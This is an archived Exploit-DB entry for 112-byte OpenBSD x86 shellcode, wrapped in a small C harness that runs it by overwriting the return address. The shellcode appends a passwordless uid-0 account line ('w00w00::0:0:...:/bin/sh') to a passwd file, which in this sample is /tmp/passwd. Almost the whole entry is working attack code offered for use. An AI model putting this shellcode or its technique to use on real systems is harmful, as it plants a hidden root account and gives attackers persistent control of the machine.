openbsd/x86 add user w00w00 112 bytes

2004-09-26T00:00:00
ID EDB-ID:13477
Type exploitdb
Reporter N/A
Modified 2004-09-26T00:00:00

Description

openbsd/x86 add user w00w00 112 bytes. Shellcode exploit for openbsd_x86 platform

                                        
                                            #include <string.h>

char shell[]=
"\xeb\x2b\x5e\x31\xc0\x88\x46\x0b"
"\x88\x46\x29\x50\xb0\x09\x50\x31"
"\xc0\x56\x50\xb0\x05\xcd\x80\x89"
"\xc3\x6a\x1d\x8d\x46\x0c\x50\x53"
"\x50\x31\xc0\xb0\x04\xcd\x80\x31"
"\xc0\xb0\x01\xcd\x80\xe8\xd0\xff"
"\xff\xff\x2f\x74\x6d\x70\x2f\x70"
"\x61\x73\x73\x77\x64\x30\x77\x30"
"\x30\x77\x30\x30\x3a\x3a\x30\x3a"
"\x30\x3a\x77\x30\x30\x77\x30\x30"
"\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f"
"\x73\x68\x0a\x30\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff";

main()
{
   int *ret;
   printf("\n%d\n",sizeof(shell));
   ret=(int*)&ret+2;
   (*ret)=(int)shell;
}

// milw0rm.com [2004-09-26]